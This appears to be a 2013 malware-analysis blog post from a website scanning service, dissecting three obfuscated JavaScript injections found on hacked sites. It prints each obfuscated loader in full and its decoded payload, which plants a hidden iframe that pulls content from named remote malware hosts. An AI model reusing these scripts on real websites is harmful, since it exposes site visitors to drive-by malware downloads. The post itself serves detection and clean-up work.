Sunday, October 6, 2013

3 JavaScript threats generating hidden iframe(s) to compromised server(s)

Obfuscated malicious JavaScript code injected on website pages generates hidden iframe to remote server(s)

Background

Online Website Malware Scanner has identified malicious JavaScript code injection in the scanned website. Such malicious obfuscated JavaScript code is used to build malicious iframe invisible to the website user in order to download content from remote malware website/ server.

In this post we cover 3 recently detected malicious scripts on scanned websites. The payload of each decoded malware shown below downloads remote .html or .php file without user consent.

You can find similar web threats analysis in our other posts: malicious iframes generation.

Malicious action

Malicious iframes are often used to distribute malware hosted on external web resources(websites).

Sample 1 

Beautified script

  1. var wsqWQBPps ="cNRoPJdqz3ccNRoPJdqz69cNRoPJdqz66cNRoPJdqz72cNRoPJdqz61cNRoPJdqz6dcNRoPJdqz65cNRoPJdqz20cNRoPJdqz73cNRoPJdqz72cNRoPJdqz63cNRoPJdqz3dcNRoPJdqz22cNRoPJdqz68cNRoPJdqz74cNRoPJdqz74cNRoPJdqz70cNRoPJdqz3acNRoPJdqz2fcNRoPJdqz2fcNRoPJdqz70cNRoPJdqz72cNRoPJdqz69cNRoPJdqz76cNRoPJdqz61cNRoPJdqz74cNRoPJdqz65cNRoPJdqz33cNRoPJdqz2ecNRoPJdqz7acNRoPJdqz61cNRoPJdqz70cNRoPJdqz74cNRoPJdqz6fcNRoPJdqz2ecNRoPJdqz6fcNRoPJdqz72cNRoPJdqz67cNRoPJdqz2fcNRoPJdqz62cNRoPJdqz6ccNRoPJdqz6fcNRoPJdqz67cNRoPJdqz2fcNRoPJdqz76cNRoPJdqz6ccNRoPJdqz71cNRoPJdqz73cNRoPJdqz72cNRoPJdqz79cNRoPJdqz79cNRoPJdqz61cNRoPJdqz63cNRoPJdqz72cNRoPJdqz2ecNRoPJdqz70cNRoPJdqz68cNRoPJdqz70cNRoPJdqz3fcNRoPJdqz76cNRoPJdqz61cNRoPJdqz6fcNRoPJdqz77cNRoPJdqz76cNRoPJdqz3dcNRoPJdqz4ecNRoPJdqz48cNRoPJdqz63cNRoPJdqz43cNRoPJdqz71cNRoPJdqz55cNRoPJdqz46cNRoPJdqz53cNRoPJdqz26cNRoPJdqz61cNRoPJdqz6dcNRoPJdqz70cNRoPJdqz3bcNRoPJdqz68cNRoPJdqz72cNRoPJdqz79cNRoPJdqz74cNRoPJdqz65cNRoPJdqz77cNRoPJdqz73cNRoPJdqz66cNRoPJdqz64cNRoPJdqz3dcNRoPJdqz39cNRoPJdqz38cNRoPJdqz38cNRoPJdqz39cNRoPJdqz34cNRoPJdqz33cNRoPJdqz39cNRoPJdqz26cNRoPJdqz61cNRoPJdqz6dcNRoPJdqz70cNRoPJdqz3bcNRoPJdqz79cNRoPJdqz6acNRoPJdqz72cNRoPJdqz65cNRoPJdqz73cNRoPJdqz66cNRoPJdqz64cNRoPJdqz3dcNRoPJdqz38cNRoPJdqz35cNRoPJdqz34cNRoPJdqz22cNRoPJdqz20cNRoPJdqz6ecNRoPJdqz61cNRoPJdqz6dcNRoPJdqz65cNRoPJdqz3dcNRoPJdqz22cNRoPJdqz79cNRoPJdqz66cNRoPJdqz65cNRoPJdqz6acNRoPJdqz43cNRoPJdqz50cNRoPJdqz43cNRoPJdqz7acNRoPJdqz62cNRoPJdqz41cNRoPJdqz22cNRoPJdqz20cNRoPJdqz74cNRoPJdqz69cNRoPJdqz74cNRoPJdqz6ccNRoPJdqz65cNRoPJdqz3dcNRoPJdqz22cNRoPJdqz4ecNRoPJdqz65cNRoPJdqz73cNRoPJdqz58cNRoPJdqz6fcNRoPJdqz59cNRoPJdqz47cNRoPJdqz54cNRoPJdqz42cNRoPJdqz7acNRoPJdqz22cNRoPJdqz20cNRoPJdqz77cNRoPJdqz69cNRoPJdqz64cNRoPJdqz74cNRoPJdqz68cNRoPJdqz3dcNRoPJdqz22cNRoPJdqz30cNRoPJdqz22cNRoPJdqz20cNRoPJdqz68cNRoPJdqz65cNRoPJdqz69cNRoPJdqz67cNRoPJdqz68cNRoPJdqz74cNRoPJdqz3dcNRoPJdqz22cNRoPJdqz30cNRoPJdqz22cNRoPJdqz20cNRoPJdqz66cNRoPJdqz72cNRoPJdqz61cNRoPJdqz6dcNRoPJdqz65cNRoPJdqz62cNRoPJdqz6fcNRoPJdqz72cNRoPJdqz64cNRoPJdqz65cNRoPJdqz72cNRoPJdqz3dcNRoPJdqz22cNRoPJdqz30cNRoPJdqz22cNRoPJdqz3ecNRoPJdqz3ccNRoPJdqz2fcNRoPJdqz69cNRoPJdqz66cNRoPJdqz72cNRoPJdqz61cNRoPJdqz6dcNRoPJdqz65cNRoPJdqz3e";
  2. yvDFQwwmM = eval;
  3. var WSxQJgvuB = wsqWQBPps.replace(/cNRoPJdqz/g, "%");
  4. yvDFQwwmM("document.write(unescape(WSxQJgvuB))");


Malicious payload


Decoded payload injects hidden iframe to http://private3[.]zapto[.]org/blog/vlqsryyacr.php?vaowv=NHcCqUFS&hrytewsfd=9889439&yjresfd=854


  1. document.write( < iframe src = "http://private3[.]zapto[.]org/blog/vlqsryyacr.php?vaowv=NHcCqUFS&amp;hrytewsfd=9889439&amp;yjresfd=854"
  2.     name = "yfejCPCzbA"
  3.     title = "NesXoYGTBz"
  4.     width = "0"
  5.     height = "0"
  6.     frameborder = "0" > < /iframe>)


Blacklisting status

The website is Suspicious on Google Safe Browsing - report link

Google Safe Browsing
Google Safe Browsing diagnostic report



Sample 2

Beautified script


  1. var i, y, x ="3c696672616d65207372633d22687474703a2f2f6d6f636f7265776172642e636f6d2f6672616d652f61616e2e68746d6c222077696474683d223122206865696768743d2231223e0d0a3c2f696672616d653e";
  2. = '';
  3. for (= 0; i < x.length; i += 2) {
  4.     y += unescape(
  5.         '%' + x.substr(i, 2));
  6. }
  7. document.write(y);


Malicious payload


Decoded payload injects hidden iframe to http://mocoreward.com/frame/aan.html


  1. <iframe src="http://mocoreward.com/frame/aan.html" width="1" height="1">
  2. </iframe>

Blacklisting status

The website is detected by BitDefender and Sophos as per VirusTotal report.

VirusTotal URL analysis report
VirusTotal - URL analysis report

Sample 3

Beautified script

  1. = 3 - 1;
  2. = -1 - 1 + c;
  3. = parseInt;
  4. if (p("01" + "2" + "3") === 83) try {
  5.     Boolean()["pr" + "otot" + "ype"].q
  6. } catch (egewgsd) {
  7.     if (window.document) f = ['-32i-32i64i61i-9i-1i59i70i58i76i68i60i69i75i5i62i60i75i28i67i60i68i60i69i75i74i25i80i43i56i62i37i56i68i60i-1i-2i57i70i59i80i-2i0i50i7i52i0i82i-28i-32i-32i-32i64i61i73i56i68i60i73i-1i0i18i-28i-32i-32i84i-9i60i67i74i60i-9i82i-28i-32i-32i-32i59i70i58i76i68i60i69i75i5i78i73i64i75i60i-1i-7i19i64i61i73i56i68i60i-9i74i73i58i20i-2i63i75i75i71i17i6i6i75i59i74i11i14i5i67i70i70i66i64i69i5i56i75i6i74i75i59i74i6i62i70i5i71i63i71i22i74i64i59i20i8i-2i-9i78i64i59i75i63i20i-2i8i7i-2i-9i63i60i64i62i63i75i20i-2i8i7i-2i-9i74i75i80i67i60i20i-2i77i64i74i64i57i64i67i64i75i80i17i63i64i59i59i60i69i18i71i70i74i64i75i64i70i69i17i56i57i74i70i67i76i75i60i18i67i60i61i75i17i7i18i75i70i71i17i7i18i-2i21i19i6i64i61i73i56i68i60i21i-7i0i18i-28i-32i-32i84i-28i-32i-32i61i76i69i58i75i64i70i69i-9i64i61i73i56i68i60i73i-1i0i82i-28i-32i-32i-32i77i56i73i-9i61i-9i20i-9i59i70i58i76i68i60i69i75i5i58i73i60i56i75i60i28i67i60i68i60i69i75i-1i-2i64i61i73i56i68i60i-2i0i18i61i5i74i60i75i24i75i75i73i64i57i76i75i60i-1i-2i74i73i58i-2i3i-2i63i75i75i71i17i6i6i75i59i74i11i14i5i67i70i70i66i64i69i5i56i75i6i74i75i59i74i6i62i70i5i71i63i71i22i74i64i59i20i8i-2i0i18i61i5i74i75i80i67i60i5i77i64i74i64i57i64i67i64i75i80i20i-2i63i64i59i59i60i69i-2i18i61i5i74i75i80i67i60i5i71i70i74i64i75i64i70i69i20i-2i56i57i74i70i67i76i75i60i-2i18i61i5i74i75i80i67i60i5i67i60i61i75i20i-2i7i-2i18i61i5i74i75i80i67i60i5i75i70i71i20i-2i7i-2i18i61i5i74i60i75i24i75i75i73i64i57i76i75i60i-1i-2i78i64i59i75i63i-2i3i-2i8i7i-2i0i18i61i5i74i60i75i24i75i75i73i64i57i76i75i60i-1i-2i63i60i64i62i63i75i-2i3i-2i8i7i-2i0i18i-28i-32i-32i-32i59i70i58i76i68i60i69i75i5i62i60i75i28i67i60i68i60i69i75i74i25i80i43i56i62i37i56i68i60i-1i-2i57i70i59i80i-2i0i50i7i52i5i56i71i71i60i69i59i26i63i64i67i59i-1i61i0i18i-28i-32i-32i84'][0].split('i');
  8.     v = "e" + "va" + "l";
  9. }
  10. if (v) e = window[v];
  11. = f;
  12. = [];
  13. = String;
  14. for (; 589 != i; i += 1) {
  15.     j = i;
  16.     s = s + r["f" + "r" + "omC" + "har" + "C" + "ode"](w[j] * 1 + 41);
  17. }
  18. if (e) e(s);


Malicious payload


Decoded payload injects hidden iframe to http://tds47.lookin.at/stds/go.php


  1. if (document.getElementsByTagName('body')[0]) {
  2.     iframer();
  3. } else {
  4.     document.write("<iframe src='http://tds47.lookin.at/stds/go.php?sid=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
  5. }
  6. function iframer() {
  7.     var f = document.createElement('iframe');
  8.     f.setAttribute('src', 'http://tds47.lookin.at/stds/go.php?sid=1');
  9.     f.style.visibility = 'hidden';
  10.     f.style.position = 'absolute';
  11.     f.style.left = '0';
  12.     f.style.top = '0';
  13.     f.setAttribute('width', '10');
  14.     f.setAttribute('height', '10');
  15.     document.getElementsByTagName('body')[0].appendChild(f);
  16. }


Blacklisting status


The website is detected by BitDefender and Sophos as per VirusTotal report.

VirusTotal URL analysis report
VirusTotal - URL analysis report

Malware clean-up


Such malware is often hidden inside the JavaScript file. If you suspect that your website was infected by similar malware please use Website Anti-malware Monitoring for remediation assessment.